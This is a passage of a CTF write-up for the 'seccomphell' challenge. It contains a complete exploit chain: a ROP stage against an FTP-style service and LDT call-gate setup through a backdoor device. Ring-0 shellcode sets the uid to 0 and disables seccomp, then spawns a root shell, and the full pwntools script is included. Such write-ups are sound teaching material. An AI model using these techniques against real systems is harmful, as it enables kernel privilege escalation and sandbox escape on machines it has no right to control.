orq $PTI_SWITCH_MASK, %rbx
movq %rbx, %cr3

// Build an `iret` stackframe rather than a `ret far` stack frame.
popq %r8 // => %rip
popq %r9 // => %cs
pushfq
orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
pushq %r9
pushq %r8
iretq
endvar ring0_stage2

var user_desc
// base2 (base_addr[31:24]) == cs_offset[31:24]
// limit_in_pages == cs_offset[23]
// seg_32bit == cs_offset[22]
// NB: Because lm is ignored, cs_offset[21] must be 0
// useable == cs_offset[20]
// limit1 (limit[19:16]) == cs_offset[19:16]
// flags0 == (arbitrary, will be overwritten later)
// base1 (base_addr[23:16]) == (ignored entirely)
// base0 (base_addr[15:0]) == __KERNEL_CS
// limit0 (limit[15:0]) == cs_offset[15:0]
.int TARGET_ENTRY // entry_number
.int __KERNEL_CS // base_addr
.int 0x01000 // limit
.int 0b00000001 // flags (int because of padding - only the low byte is actually used)
// |||||\/\____ .seg_32bit (D) (must be 1 for set_thread_area)
// ||||| \_____ .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
// ||||\_______ .read_exec_only (!R)
// |||\________ .limit_in_pages (G)
// ||\_________ .seg_not_present (!P)
// |\__________ .useable (AV)
// \___________ .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
// base2 (base_addr[31:24]) == (ignored)
// flags1 == (ignored)
// limit1 (limit[19:16]) == (ignored)
// flags0 == (mostly ignored, except for the type)
// base1 (base_addr[23:16]) == (ignored)
// base0 (base_addr[15:0]) == cs_offset[63:48]
// limit0 (limit[15:0]) == cs_offset[47:32]

var high_desc
// We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
// above the target descriptor).
.int TARGET_ENTRY + 2 // entry_number
.int 0xffff // base_addr
.int 0xffff // limit
.int 0b00111000 // flags
endvar high_desc

asciz module_path, "/dev/i_am_definitely_not_backdoor"
asciz shell_path, "/bin/sh"

var shell_argv
.quad shell_path
.quad 0
endvar shell_argv

var module_message
.quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5
.byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
movl $sizeof_\desc, %edx
leaq \desc(%rip), %rsi
movl $0x11, %edi
check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.
.endm

fn _start
// Open device
xorl %edx, %edx
movl $O_WRONLY, %esi
leaq module_path(%rip), %rdi
check_syscall_64 $SYS_open
movl %eax, %r15d

// "stac" in CPL3
pushfq
orq $(1 << 18), (%rsp)
popfq

// Update the LDT
modify_ldt user_desc
modify_ldt high_desc

// Trigger the overwrite
movl $sizeof_module_message, %edx
leaq module_message(%rip), %rsi
movl %r15d, %edi
check_syscall_64 $SYS_write

// Go to CPL 0
far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
lcall *(gate_target)

// Get a shell
leaq shell_path(%rip), %rdi
leaq shell_argv(%rip), %rsi
xorl %edx, %edx
check_syscall_64 $SYS_execve
movq $0, %rdi
check_syscall_64 $SYS_exit

// vim:syntax=asm:
```

</details>

So let's rewrite this into a Python payload.

Stage 4:

<details>

```python
trampolin = asm('int 3')

far_func = p64(0x67dead8664)

payload = bytearray(far_func+seccomp+asm(f"""
{shc.echo("STAGE 4")}

{shc.echo("[+] INIT\n")}

{shc.pushstr("/dev/i_am_definitely_not_backdoor")}
{shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
cmp rax, 0
jl FAIL

mov rbx, rax
{shc.echo("[+] backdoor fd: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

{shc.echo("\n[+] START\n")}

// disable SMAP
{shc.echo("[+] 'stac' in CPL3\n")}
pushfq
or QWORD PTR [rsp],0x40000
popfq

{shc.echo("[+] modify_ldt user\n")}
mov rax, 0x100001000
push rax
mov rax, 0x100000000c
push rax
mov rsi, rsp

mov edx,0x10
mov edi,0x11
mov eax,{cst.SYS_modify_ldt}
syscall
cmp rax, 0
jl FAIL

{shc.echo("[+] modify_ldt high\n")}

mov rax, 0x380000FFFF
push rax
mov rax, 0xFFFF0000000E
push rax
mov rsi, rsp

mov edx,0x10
mov edi,0x11
mov eax,{cst.SYS_modify_ldt}

syscall
cmp rax, 0
jl FAIL

{shc.echo("[+] write to backdoor\n")}
{shc.pushstr('TEST')}
mov rsi, rsp
{shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
cmp rax, 0
jl FAIL

{shc.echo("[+] cpy trampolin\n")}
{shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
lea rsi, [rip+TRAMPOLIN]
{shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

// call CALL GATE for privilige escalation
{shc.echo("[+] go to CPL 0\n")}
call FWORD PTR ds:{PIVOT-0xa6b00}

// should be root
{shc.echo("[+] spawning shell\n")}
{shc.sh()}

{shc.echo("[+] END\n")}
int 3

FAIL:
mov rbx, rax
neg rbx
{shc.echo("[-] errno: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
{shc.echo("\n[-] FAIL\n")}
int 3

TRAMPOLIN:
""") + trampolin)
```

</details>
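
One detail worth unpacking is the `far_func` blob at the very start of the payload: `call FWORD PTR` consumes a 6-byte far pointer, a 4-byte offset followed by a 2-byte selector. The offset is ignored when the selector points at a call gate (the gate supplies the target RIP), so only the selector matters. A quick sketch of how `0x67dead8664` decomposes (constants from the PoC above):

```python
import struct

TARGET_ENTRY = 12
LDT_SELECTOR = 0b100  # table-indicator bit: look in the LDT, not the GDT
RPL_USER     = 0b011  # requested privilege level 3

selector = (TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER
assert selector == 0x67

# 4-byte (ignored) offset + 2-byte selector = the first 6 bytes of far_func
far_ptr = struct.pack('<IH', 0xdead8664, selector)
assert far_ptr == (0x67dead8664).to_bytes(8, 'little')[:6]
```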

### Stage 5.1: call gate trampoline

The trampoline stays the same as in the [one_byte writeup](https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/).

Stage 5.1:

<details>

```python
TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
PERCPU_CURRENT=0x1fbc0

ring0 = asm('int 3')
RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute
trampolin = asm(f"""
cli

// Read LSTAR to bypass KASLR
mov ecx, {MSR_LSTAR}
rdmsr
shl rdx, 32
or rdx, rax
subq rdx, {KASLR_LSTAR}
movq rbp, rdx

// Disable WP
movq r8, cr0
andq r8, {(~(1 << 16))}
movq cr0, r8

// Copy stage 5.2 to the mapped kernel entry point
movq rdi, rbp
addq rdi, {KASLR_WRITE_TO}
movq r15, rdi
lea rsi, [rip+RING_0]
mov ecx, {RING0_LEN}
rep movsb

// Jump there.
jmp r15

RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)
```

</details>

## Sandbox (Seccomp)

Finally, let's try to write shellcode to disable seccomp.

### Stage 5.2: ring 0 payload

For ring0 we need to make some adjustments. The privilege escalation stays the same as in our PoC, but we also have to find a way to disable seccomp. We found [this writeup](https://keksite.in/posts/Seccomp-Bypass/) about disabling seccomp, but it isn't applicable anymore because the x86 Linux kernel changed the way seccomp works in newer versions; still, it gives us an important starting point: current (the task_struct).

Let's first look at the [task_struct](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748), which simply includes a struct called [seccomp](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22):

[include/uapi/linux/seccomp.h](https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10):
```c
/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED 0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */
```

> Note: `SECCOMP_MODE_DISABLED` is not a valid mode to set using prctl [Source Code](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2084)

[include/linux/seccomp_types.h](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22):
```c
struct seccomp {
	int mode;
	atomic_t filter_count;
	struct seccomp_filter *filter;
};
```

So can we just manually set the mode to `SECCOMP_MODE_DISABLED`? ... no.
I also tried overwriting other parts of the seccomp struct, but none of that worked either. OK, let's go deeper down the rabbit hole and look at [seccomp_filter](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L226).

[kernel/seccomp.c](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L226):
```c
struct seccomp_filter {
	refcount_t refs;
	refcount_t users;
	bool log;
	bool wait_killable_recv;
	struct action_cache cache;
	struct seccomp_filter *prev;
	struct bpf_prog *prog;
	struct notification *notif;
	struct mutex notify_lock;
	wait_queue_head_t wqh;
};
```

No luck either; manually patching the instructions of the [bpf_prog](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/bpf.h#L1528) didn't work as well.

> Note: I didn't try messing with the flags to e.g. disable jited, so this might have worked

So what now? ... Well, if we look at the seccomp_filter struct we see a member called `prev`. Interesting, let's look at the [source code](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046) for adding seccomp filters:

Basically the seccomp_filters form a linked list, where new filters become the new head of the list.

So let's first try to add a simple rule that allows everything.

```c
#define ALLOW_PROCESS \
  BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

void allow_all() {

  struct sock_filter seccomp_filter[] = {
    ALLOW_PROCESS,
  };

  struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
    .filter = (struct sock_filter*)&seccomp_filter,
  };

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}
```

which basically creates a struct that looks like this:

```
00:0000│ rdx rsp 0x7fffffffe750 ◂— 1
01:0008│-018 0x7fffffffe758 —▸ 0x7fffffffe760 ◂— 0x7fff000000000006
02:0010│-010 0x7fffffffe760 ◂— 0x7fff000000000006
```

and add it by calling [do\_seccomp](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046) directly.
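
For reference, the single qword in that dump is just a `struct sock_filter` packed into 8 bytes; a quick check (a sketch, constants taken from the kernel UAPI headers) that `0x7fff000000000006` really is `BPF_RET | BPF_K` returning `SECCOMP_RET_ALLOW`:

```python
import struct

BPF_RET, BPF_K = 0x06, 0x00
SECCOMP_RET_ALLOW = 0x7fff0000

# struct sock_filter { __u16 code; __u8 jt; __u8 jf; __u32 k; };
rule = struct.pack('<HBBI', BPF_RET | BPF_K, 0, 0, SECCOMP_RET_ALLOW)
assert int.from_bytes(rule, 'little') == 0x7fff000000000006
```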

Well, this added our rule to the top of the linked list and incremented the `filter_count`, but we still can't call new syscalls. This is because `SECCOMP_RET_KILL_PROCESS` takes precedence over `SECCOMP_RET_ALLOW`, according to the [man pages](https://www.man7.org/linux/man-pages/man2/seccomp.2.html).

But what we can do now is manually reduce `seccomp.filter_count` to 1 and unlink the original seccomp_filter by clearing the `prev` pointer of our fake one (`current->seccomp.filter->prev = NULL`), and with that we have successfully disabled seccomp.
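
To make the unlink explicit, here is a toy Python model of the filter chain (purely illustrative; these are not kernel structures):

```python
class SeccompFilter:
    def __init__(self, verdict, prev=None):
        self.verdict, self.prev = verdict, prev

# the backdoor installed the RET_KILL-terminated whitelist first ...
whitelist = SeccompFilter('whitelist, else RET_KILL')
# ... then our do_seccomp() call prepended the allow-all filter
head = SeccompFilter('RET_ALLOW', prev=whitelist)
filter_count = 2

# every syscall still runs ALL filters and the strongest verdict wins,
# so we unlink the old filter and fix up the count:
head.prev = None
filter_count = 1
```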

Stage 5.2:

<details>

```python
PAYLOAD = 0x401000

# fake seccomp filter RETURN ALLOW
seccomp = flat(
1, # size
PAYLOAD+0x18, # args (ptr to rules)
0x7fff000000000006, # rules (RETURN ALLOW)
)

PTI_SWITCH_MASK=0x1000

KASLR_WRITE_TO=0xbad000

# ffffffff810fc820 T commit_creds
COMMIT_CRED = 0xfc820

# ffffffff810fccd0 T prepare_creds
PREP_CRED = 0xfccd0

# https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046
# ffffffff81200cd0 t do_seccomp
DO_SECCOMP = 0x200cd0

SECCOMP_SET_MODE_FILTER=1

# current struct offset from gs
CURRENT=0x34940

# seccomp_filter: https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L22

ring0 = asm(f"""
// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq rbx, cr3

// Switch to the kernel page table.
andq rbx, {~PTI_SWITCH_MASK}
movq cr3, rbx

// and rdi, {~0xffffff}
sub rdi, {KASLR_WRITE_TO +0x400000}
and rdi, {~0xfffff}
mov r15, rdi

// add fake seccomp filter, allow all
lea rax, [r15+{DO_SECCOMP}]
mov rdi, {SECCOMP_SET_MODE_FILTER}
xor rsi, rsi
mov rdx, {PAYLOAD+0x8}
call rax

// privilige escalation
// crpt_cred = prepare_cred();

lea rax, [r15+{PREP_CRED}]
call rax

// crpt_cred.uid = 0;
// crpt_cred.gid = 0;
mov rdi, rax
movq [rdi+8], 0

// commit_creds(crpt_cred);
lea rax, [r15+{COMMIT_CRED}]
call rax

// DISABLE SECCOMP

// get current
movq rax, qword ptr gs:[{CURRENT}]

// current.seccomp.count = 1 (was 2, fake and init)
mov dword ptr[rax+0xc6c], 1

// get current.seccomp.seccomp_filter
mov rax, qword ptr[rax+0xc70]
// get current.seccomp.seccomp_filter->prev = NULL
mov qword ptr[rax+0x90], 0

// Swap back
swapgs

// Switch the page table back around
orq rbx, {PTI_SWITCH_MASK}
movq cr3, rbx

// Build an `iret` stackframe rather than a `ret far` stack frame.
// => %rip
popq r8
// => %cs
popq r9

pushfq
// Set IF in the new RFLAGS (like sti)
or qword ptr [rsp], {1 << 9}
pushq r9
pushq r8
iretq

""")

```

</details>

## Final stage: get flag

At this point everything should be straightforward. Sadly, this version worked but had a pretty bad success rate, probably because the function calls re-enable interrupts, as mentioned in the [one_byte writeup](https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/). Still, the exploit was good enough to get the flag.

`/root/flag.txt`
<details>

```
NOPE <3
Please get a full root shell
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣆⡐⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⢿⠿⠿⠿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣸⣮⢰⣄⣸⡇⠄⠀⠠⠀⠀⠀⠀⢀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⡗⡽⠤⠉⣹⠇⠀⠁⡄⠀⠀⡀⠀⠀⠁⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⢴⣫⣝⣉⣽⡁⠀⠀⠀⠇⠀⠈⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠁⣲⡵⢻⣧⡎⡰⢋⣷⣤⣔⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠐⠄⠀⢀⣠⣶⣿⣿⣅⣺⣿⡋⢀⣾⣿⣿⣿⣿⣿⣿⣆⠀⠃⢀⠎⠀⠀⠀
⠀⠀⠀⠀⠀⠐⠀⠈⠂⠀⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠈⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢃⠀⠃⢈⣿⣿⣿⣿⣿⣏⢸⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣋⠝⣿⣿⣿⣿⣿⣿⣷⣄⠃⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣭⣽⣘⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠀⢸⣿⣿⣭⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⣿⠿⠟⠀⡀⠀
⠀⠀⢈⠒⡀⠀⠀⠀⠀⠈⢛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⢀⠐⡀⠀
⣀⢠⠊⢀⠰⠀⠀⠀⠠⢀⠀⢐⡈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠠⠈⡐⠂⠐⡄⢀
```

</details>

Actually this wasn't the flag; we need to use our root shell to find the real flag.

Using `find / -name '*flag*' 2> /dev/null` we find a flag generator at `/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag`, which we can execute to get the flag.

```python
while (out := rl().rstrip()) != b'[+] spawning shell':
    linfo(out.decode())

linfo(out.decode())

linfo("FINAL STAGE")

sl('echo PWND')
# sla('PWND', "find / -name '*flag*' 2> /dev/null")
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()
```

## Improving success rate

After the CTF concluded I talked with others who solved the challenge and realized why my success rate was so bad: it was the function calls. So, inspired by other people's solutions, I rewrote my shellcode to have a much better success rate.

For privilege escalation we manually edit the `cred` struct that is linked in `current` to become root (normally there are both cred and real_cred, but in this scenario they are the same, so we simply edit the uid and gid of one to become root).

Disabling seccomp is more interesting. Basically, in [thread_info](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64) there is an attribute called [syscall_work](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51) that sets flags for e.g. enabling seccomp. So what we need to do is unset the flag, and we can then execute all syscalls. But this only works for the current task_struct; if we `execve` another binary, seccomp gets reset.

So additionally we need to set [seccomp->mode](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22) to [SECCOMP_MODE_DISABLED](https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10).

Stage 5.2 (improved):

<details>

```python
PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

/* PROLOGUE */

// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq rbx, cr3

// Switch to the kernel page table.
andq rbx, {~PTI_SWITCH_MASK}
movq cr3, rbx

// get current
movq r15, qword ptr gs:[{CURRENT}]

/* PRIVILIGE ESCALATION */

// current->cred.uid = 0
mov rax, qword ptr[r15+{CRED_OFF}]
mov dword ptr[rax+{UID_OFF}], 0

/* DISABLE SECCOMP */

// current.thread_info.syscall_work &= ~SYSCALL_WORK_SECCOMP
and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

// current.seccomp.mode = SECCOMP_MODE_DISABLED
mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

/* EPILOG */

// Swap back
swapgs

// Switch the page table back around
orq rbx, {PTI_SWITCH_MASK}
movq cr3, rbx

// Build an `iret` stackframe rather than a `ret far` stack frame.
// => %rip
popq r8
// => %cs
popq r9

pushfq
// Set IF in the new RFLAGS (like sti)
or qword ptr [rsp], {1 << 9}
pushq r9
pushq r8
iretq

""")
```

</details>

## Exploit

Flag: `hitcon{if_kernel_goes_brrrr_seccomp_filter_becomes_this:https://www.youtube.com/watch?v=nTT2fNyKgUE}`

exploit.py:

<details>

```python
#!/usr/bin/env python3
from pwn import *

GDB_OFF = 0x555555554000
IP = 'seccomphell.chal.hitconctf.com' if args.REMOTE else 'localhost'
PORT = int(sys.argv[1]) if len(sys.argv) >= 2 else 22222

BINARY = './bins/i_am_not_backdoor.bin'
ARGS = []
ENV = {
    'SHLVL': '2',
    'HOME': '/',
    'TERM': 'linux',
    'PWD': '/',
    'SOCAT_PID': '190',
    'SOCAT_PPID': '189',
    'SOCAT_VERSION': '1.7.3.0',
    'SOCAT_SOCKADDR': '10.0.2.15',
    'SOCAT_SOCKPORT': '22222',
    'SOCAT_PEERADDR': '10.0.2.2',
    'SOCAT_PEERPORT': '54394'
} # os.environ
GDB = f"""
set follow-fork-mode parent

# backdoor
# b * 0x4018dc

# rop start
# b * 0x401d05

# loader
hb * 0x400000

# payload
hb * 0x401000

c"""

context.binary = exe = ELF(BINARY, checksec=False)
# libc = ELF('', checksec=False)
context.aslr = True

cst = constants
shc = shellcraft

linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerror = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, byt(v)) if o == 'r' else byt(x).rjust(s, byt(v))
padhex = lambda x, s=None: pad(hex(x)[2:],((x.bit_length()//8)+1)*2 if s is None else s, b'0', 'l')
upad = lambda x: u64(pad(x))
tob = lambda x: bytes.fromhex(padhex(x).decode())

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss = lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw) if len(x) < s else se(x, *a, **kw)
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(byt(x), byt(y), *a, **kw)
sa = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw) if len(y) < s else sa(x, y, *a, **kw)
ra = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t=t, *a, **kw)[:-1]
re = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl = lambda t=None, *a, **kw: gt(t).close(*a, **kw)

vm = None
def get_target(**kw):
    global vm

    if args.REMOTE or args.TEST:
        # context.log_level = 'debug'
        return remote(IP, PORT)

    if args.LOCAL:
        if args.GDB:
            return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
        return process([BINARY] + ARGS, env=ENV, **kw)

    try:
        from vagd import Dogd, Qegd, Box # only load vagd if needed
    except:
        log.error("Failed to import vagd, either run locally using LOCAL or install it")
    if not vm:
        vm = Dogd(BINARY, image=Box.DOCKER_JAMMY, ex=True, fast=True) # Docker
        # vm = Qegd(BINARY, img=Box.QEMU_JAMMY, ex=True, fast=True) # Qemu
    if vm.is_new:
        log.info("new vagd instance") # additional setup here
    return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)

t = get_target()

#############################################
# STAGE 1: ROP BACKDOOR #
#############################################

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b''

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2)
rop.rdi = 0x258
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

#############################################
# STAGE 2: PIVOT ROP #
#############################################

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
    0: std,
    0x10: b'STAGE 2',
    0x18: b'STAGE 3',
    0x20: b'FAIL',
    0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)

#############################################
# STAGE 5.2: RING 0 PAYLOAD #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

/* PROLOGUE */

// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq rbx, cr3

// Switch to the kernel page table.
andq rbx, {~PTI_SWITCH_MASK}
movq cr3, rbx

// get current
movq r15, qword ptr gs:[{CURRENT}]

/* PRIVILIGE ESCALATION */

// current->cred.uid = 0
mov rax, qword ptr[r15+{CRED_OFF}]
mov dword ptr[rax+{UID_OFF}], 0

/* DISABLE SECCOMP */

// current.thread_info.syscall_work &= ~SYSCALL_WORK_SECCOMP
and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

// current.seccomp.mode = SECCOMP_MODE_DISABLED
mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

/* EPILOG */

// Swap back
swapgs

// Switch the page table back around
orq rbx, {PTI_SWITCH_MASK}
movq cr3, rbx

// Build an `iret` stackframe rather than a `ret far` stack frame.
// => %rip
popq r8
// => %cs
popq r9

pushfq
// Set IF in the new RFLAGS (like sti)
or qword ptr [rsp], {1 << 9}
pushq r9
pushq r8
iretq

""")

#############################################
# STAGE 5.1: CALL GATE TRAMPOLIN #
#############################################

